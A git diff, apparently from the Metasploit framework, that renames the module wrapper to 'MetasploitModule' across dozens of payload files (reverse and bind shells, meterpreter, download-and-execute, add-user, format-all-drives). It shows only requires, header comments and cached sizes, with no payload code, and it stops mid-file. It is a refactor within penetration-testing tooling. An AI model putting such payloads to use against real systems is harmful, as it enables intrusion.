'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 74 diff --git a/modules/payloads/singles/linux/x86/adduser.rb b/modules/payloads/singles/linux/x86/adduser.rb index 064b5ca314..2a82a0d458 100644 --- a/modules/payloads/singles/linux/x86/adduser.rb +++ b/modules/payloads/singles/linux/x86/adduser.rb @@ -15,7 +15,7 @@ require 'msf/core' # Adds a UID 0 user to /etc/passwd. # ### -module Metasploit3 +module MetasploitModule CachedSize = 97 diff --git a/modules/payloads/singles/linux/x86/chmod.rb b/modules/payloads/singles/linux/x86/chmod.rb index 6ed4ea11a0..b2cf018252 100644 --- a/modules/payloads/singles/linux/x86/chmod.rb +++ b/modules/payloads/singles/linux/x86/chmod.rb @@ -10,7 +10,7 @@ require 'msf/core' # # Kris Katterjohn - 03/03/2008 ### -module Metasploit3 +module MetasploitModule CachedSize = 36 diff --git a/modules/payloads/singles/linux/x86/exec.rb b/modules/payloads/singles/linux/x86/exec.rb index d81ac237ad..d4a12e8d2a 100644 --- a/modules/payloads/singles/linux/x86/exec.rb +++ b/modules/payloads/singles/linux/x86/exec.rb @@ -13,7 +13,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 43 diff --git a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb index ef79d117ed..9f1f1f351f 100644 --- a/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/meterpreter_x86_linux' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb index a84023cfe1..8cb0c265f1 100644 --- a/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/meterpreter_x86_linux' require 'msf/base/sessions/meterpreter_options' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/linux/x86/read_file.rb b/modules/payloads/singles/linux/x86/read_file.rb index 6d9a0a9b89..e51b91f598 100644 --- a/modules/payloads/singles/linux/x86/read_file.rb +++ b/modules/payloads/singles/linux/x86/read_file.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 63 diff --git a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb index af469cfebf..135d77a7d8 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 90 diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb index f6f90ce56f..c50a672018 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 78 diff --git a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb index 13c7b39632..e5e2a7f3f9 100644 --- a/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb +++ b/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 57 diff --git a/modules/payloads/singles/linux/x86/shell_find_port.rb b/modules/payloads/singles/linux/x86/shell_find_port.rb index 4961b81e72..f76634a2ff 100644 --- a/modules/payloads/singles/linux/x86/shell_find_port.rb +++ b/modules/payloads/singles/linux/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 62 diff --git a/modules/payloads/singles/linux/x86/shell_find_tag.rb b/modules/payloads/singles/linux/x86/shell_find_tag.rb index 9a525d5e3b..3d2e84af78 100644 --- a/modules/payloads/singles/linux/x86/shell_find_tag.rb +++ b/modules/payloads/singles/linux/x86/shell_find_tag.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_tag' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 69 diff --git a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb index f472235c1f..3e888459dc 100644 --- a/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 68 diff --git a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb index 66c692ff96..b99eddb02e 100644 --- a/modules/payloads/singles/mainframe/shell_reverse_tcp.rb +++ b/modules/payloads/singles/mainframe/shell_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/mainframe_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 339 diff --git a/modules/payloads/singles/nodejs/shell_bind_tcp.rb b/modules/payloads/singles/nodejs/shell_bind_tcp.rb index 8329175ca4..678f5b9742 100644 --- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb @@ -12,7 +12,7 @@ require 'msf/core/payload/nodejs' require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' -module Metasploit3 +module MetasploitModule CachedSize = 456 diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb index b7cf44698d..7e4b4c4da1 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'msf/core/payload/nodejs' require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' -module Metasploit3 +module MetasploitModule CachedSize = 488 diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb index 140ccdfa85..b882a0d084 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 516 diff --git a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb index 278f72a760..8df43d658b 100644 --- a/modules/payloads/singles/osx/armle/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 200 diff --git a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb index 86aee3cfc5..408b2e1fd2 100644 --- a/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/armle/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 152 diff --git a/modules/payloads/singles/osx/armle/vibrate.rb b/modules/payloads/singles/osx/armle/vibrate.rb index aaa15641e3..c5457a8d6d 100644 --- a/modules/payloads/singles/osx/armle/vibrate.rb +++ b/modules/payloads/singles/osx/armle/vibrate.rb @@ -7,7 +7,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 16 diff --git a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb index 90c8ebed6f..d19475a5f0 100644 --- a/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 224 diff --git a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb index 4973454069..93b6fd73c9 100644 --- a/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/ppc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 164 diff --git a/modules/payloads/singles/osx/x64/exec.rb b/modules/payloads/singles/osx/x64/exec.rb index 126b9b4433..c87e29badd 100644 --- a/modules/payloads/singles/osx/x64/exec.rb +++ b/modules/payloads/singles/osx/x64/exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 31 diff --git a/modules/payloads/singles/osx/x64/say.rb b/modules/payloads/singles/osx/x64/say.rb index a270e4ee5a..09532e4ec3 100644 --- a/modules/payloads/singles/osx/x64/say.rb +++ b/modules/payloads/singles/osx/x64/say.rb @@ -6,7 +6,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 53 diff --git a/modules/payloads/singles/osx/x64/shell_bind_tcp.rb b/modules/payloads/singles/osx/x64/shell_bind_tcp.rb index 246bbcc2b2..e4d1f0dcc3 100644 --- a/modules/payloads/singles/osx/x64/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x64/shell_bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 136 diff --git a/modules/payloads/singles/osx/x64/shell_find_tag.rb b/modules/payloads/singles/osx/x64/shell_find_tag.rb index e10354938a..5a4644b817 100644 --- a/modules/payloads/singles/osx/x64/shell_find_tag.rb +++ b/modules/payloads/singles/osx/x64/shell_find_tag.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_tag' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 107 diff --git a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb index 13e4586d5b..ace5a6988a 100644 --- a/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x64/shell_reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 108 diff --git a/modules/payloads/singles/osx/x86/exec.rb b/modules/payloads/singles/osx/x86/exec.rb index 688f654fb0..65a42cb5bd 100644 --- a/modules/payloads/singles/osx/x86/exec.rb +++ b/modules/payloads/singles/osx/x86/exec.rb @@ -14,7 +14,7 @@ require 'msf/core' # Executes an arbitrary command. # ### -module Metasploit3 +module MetasploitModule CachedSize = 24 diff --git a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb index 3ceef27567..3cdd12ad3e 100644 --- a/modules/payloads/singles/osx/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 74 diff --git a/modules/payloads/singles/osx/x86/shell_find_port.rb b/modules/payloads/singles/osx/x86/shell_find_port.rb index a73ce6d16a..2304a33ea8 100644 --- a/modules/payloads/singles/osx/x86/shell_find_port.rb +++ b/modules/payloads/singles/osx/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 61 diff --git a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb index 448d9fcd01..d8a4057d56 100644 --- a/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 65 diff --git a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb index d40d2cdaf7..c85f1efd8e 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 152 diff --git a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb index 3803a6ce9c..403ee15239 100644 --- a/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb +++ b/modules/payloads/singles/osx/x86/vforkshell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 131 diff --git a/modules/payloads/singles/php/bind_perl.rb b/modules/payloads/singles/php/bind_perl.rb index a40a20d88e..f7009ff787 100644 --- a/modules/payloads/singles/php/bind_perl.rb +++ b/modules/payloads/singles/php/bind_perl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 230 diff --git a/modules/payloads/singles/php/bind_perl_ipv6.rb b/modules/payloads/singles/php/bind_perl_ipv6.rb index f16b2c7b48..63402cbd52 100644 --- a/modules/payloads/singles/php/bind_perl_ipv6.rb +++ b/modules/payloads/singles/php/bind_perl_ipv6.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 230 diff --git a/modules/payloads/singles/php/bind_php.rb b/modules/payloads/singles/php/bind_php.rb index 0ffbedb343..f6a35f64cb 100644 --- a/modules/payloads/singles/php/bind_php.rb +++ b/modules/payloads/singles/php/bind_php.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/php/bind_php_ipv6.rb b/modules/payloads/singles/php/bind_php_ipv6.rb index 130f4320d1..5507578205 100644 --- a/modules/payloads/singles/php/bind_php_ipv6.rb +++ b/modules/payloads/singles/php/bind_php_ipv6.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/php/download_exec.rb b/modules/payloads/singles/php/download_exec.rb index 7fa71530b1..c0f5941236 100644 --- a/modules/payloads/singles/php/download_exec.rb +++ b/modules/payloads/singles/php/download_exec.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/payload/php' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/php/exec.rb b/modules/payloads/singles/php/exec.rb index 3fce154d8c..09b07f6530 100644 --- a/modules/payloads/singles/php/exec.rb +++ b/modules/payloads/singles/php/exec.rb @@ -10,7 +10,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb index df54d255cd..2231bdda47 100644 --- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_php' require 'msf/base/sessions/meterpreter_options' -module Metasploit4 +module MetasploitModule CachedSize = 26778 diff --git a/modules/payloads/singles/php/reverse_perl.rb b/modules/payloads/singles/php/reverse_perl.rb index 0cd13b8e44..194c5b90fa 100644 --- a/modules/payloads/singles/php/reverse_perl.rb +++ b/modules/payloads/singles/php/reverse_perl.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/php/reverse_php.rb b/modules/payloads/singles/php/reverse_php.rb index 0e089fdab3..95b71cea29 100644 --- a/modules/payloads/singles/php/reverse_php.rb +++ b/modules/payloads/singles/php/reverse_php.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/php/shell_findsock.rb b/modules/payloads/singles/php/shell_findsock.rb index fa366b6bb7..1595e817e7 100644 --- a/modules/payloads/singles/php/shell_findsock.rb +++ b/modules/payloads/singles/php/shell_findsock.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' require 'msf/core/handler/find_shell' -module Metasploit3 +module MetasploitModule CachedSize = :dynamic diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index 4aa85a2d42..db95d43a5e 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -10,7 +10,7 @@ require 'msf/core/payload/python/meterpreter_loader' require 'msf/core/payload/python/bind_tcp' require 'msf/base/sessions/meterpreter_python' -module Metasploit4 +module MetasploitModule CachedSize = 51630 diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index 91580b3d11..0e6c39e5de 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/core/payload/python/meterpreter_loader' require 'msf/core/payload/python/reverse_http' require 'msf/base/sessions/meterpreter_python' -module Metasploit4 +module MetasploitModule CachedSize = 51590 diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index 855b9ff3dc..4ce34b05c2 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/core/payload/python/meterpreter_loader' require 'msf/core/payload/python/reverse_http' require 'msf/base/sessions/meterpreter_python' -module Metasploit4 +module MetasploitModule CachedSize = 51594 diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index 1caeb47e89..fbce238351 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/core/payload/python/meterpreter_loader' require 'msf/core/payload/python/reverse_tcp' require 'msf/base/sessions/meterpreter_python' -module Metasploit4 +module MetasploitModule CachedSize = 51546 diff --git a/modules/payloads/singles/python/shell_reverse_tcp.rb b/modules/payloads/singles/python/shell_reverse_tcp.rb index 2a7ceb923f..372ce0e4fd 100644 --- a/modules/payloads/singles/python/shell_reverse_tcp.rb +++ b/modules/payloads/singles/python/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 401 diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb index c3e6eb0765..ca80b41475 100644 --- a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 557 diff --git a/modules/payloads/singles/ruby/shell_bind_tcp.rb b/modules/payloads/singles/ruby/shell_bind_tcp.rb index 943a4fe242..b8554cbe4f 100644 --- a/modules/payloads/singles/ruby/shell_bind_tcp.rb +++ b/modules/payloads/singles/ruby/shell_bind_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 516 diff --git a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb index 071ae85179..f084531e39 100644 --- a/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb +++ b/modules/payloads/singles/ruby/shell_bind_tcp_ipv6.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 524 diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp.rb b/modules/payloads/singles/ruby/shell_reverse_tcp.rb index 72db7766bd..cf4cb17543 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 516 diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb index 0f16cba516..b2c7bef693 100644 --- a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/reverse_tcp_ssl' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 444 diff --git a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb index 1605bdd0ae..ed921903ab 100644 --- a/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 180 diff --git a/modules/payloads/singles/solaris/sparc/shell_find_port.rb b/modules/payloads/singles/solaris/sparc/shell_find_port.rb index 6027131f48..050d136438 100644 --- a/modules/payloads/singles/solaris/sparc/shell_find_port.rb +++ b/modules/payloads/singles/solaris/sparc/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 136 diff --git a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb index 6957558e47..6d29055d6f 100644 --- a/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/sparc/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 144 diff --git a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb index f90d730769..d8360af809 100644 --- a/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 95 diff --git a/modules/payloads/singles/solaris/x86/shell_find_port.rb b/modules/payloads/singles/solaris/x86/shell_find_port.rb index 63f6835cfc..c06c224c1e 100644 --- a/modules/payloads/singles/solaris/x86/shell_find_port.rb +++ b/modules/payloads/singles/solaris/x86/shell_find_port.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/find_port' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 86 diff --git a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb index 8263e301da..14b2b37855 100644 --- a/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb +++ b/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule CachedSize = 91 diff --git a/modules/payloads/singles/tty/unix/interact.rb b/modules/payloads/singles/tty/unix/interact.rb index 71ef428f1d..af1d155348 100644 --- a/modules/payloads/singles/tty/unix/interact.rb +++ b/modules/payloads/singles/tty/unix/interact.rb @@ -9,7 +9,7 @@ require 'msf/core/handler/find_tty' require 'msf/base/sessions/command_shell' -module Metasploit3 +module MetasploitModule CachedSize = 0 diff --git a/modules/payloads/singles/windows/adduser.rb b/modules/payloads/singles/windows/adduser.rb index ce3d1fd43c..3c20929862 100644 --- a/modules/payloads/singles/windows/adduser.rb +++ b/modules/payloads/singles/windows/adduser.rb @@ -13,7 +13,7 @@ require 'msf/core/payload/windows/exec' # Extends the Exec payload to add a new user. # ### -module Metasploit3 +module MetasploitModule CachedSize = 282 diff --git a/modules/payloads/singles/windows/dns_txt_query_exec.rb b/modules/payloads/singles/windows/dns_txt_query_exec.rb index dcb1415381..943fbec81f 100644 --- a/modules/payloads/singles/windows/dns_txt_query_exec.rb +++ b/modules/payloads/singles/windows/dns_txt_query_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 285 diff --git a/modules/payloads/singles/windows/download_exec.rb b/modules/payloads/singles/windows/download_exec.rb index 3ecde4535b..1354a8d750 100644 --- a/modules/payloads/singles/windows/download_exec.rb +++ b/modules/payloads/singles/windows/download_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 423 diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index 436c0c3dfe..4df00b2d8f 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -11,7 +11,7 @@ require 'msf/core/payload/windows/exec' # Executes a command on the target machine # ### -module Metasploit3 +module MetasploitModule CachedSize = 192 diff --git a/modules/payloads/singles/windows/format_all_drives.rb b/modules/payloads/singles/windows/format_all_drives.rb index b9b0d580d4..e8a446f189 100644 --- a/modules/payloads/singles/windows/format_all_drives.rb +++ b/modules/payloads/singles/windows/format_all_drives.rb @@ -14,7 +14,7 @@ require 'msf/core' -module Metasploit3 +module MetasploitModule CachedSize = 393 diff --git a/modules/payloads/singles/windows/loadlibrary.rb b/modules/payloads/singles/windows/loadlibrary.rb index e0072623c0..8fe7335668 100644 --- a/modules/payloads/singles/windows/loadlibrary.rb +++ b/modules/payloads/singles/windows/loadlibrary.rb @@ -11,7 +11,7 @@ require 'msf/core/payload/windows/loadlibrary' # Executes a command on the target machine # ### -module Metasploit3 +module MetasploitModule CachedSize = 230 diff --git a/modules/payloads/singles/windows/messagebox.rb b/modules/payloads/singles/windows/messagebox.rb index 291d792b63..88ee9f8ccf 100644 --- a/modules/payloads/singles/windows/messagebox.rb +++ b/modules/payloads/singles/windows/messagebox.rb @@ -7,7 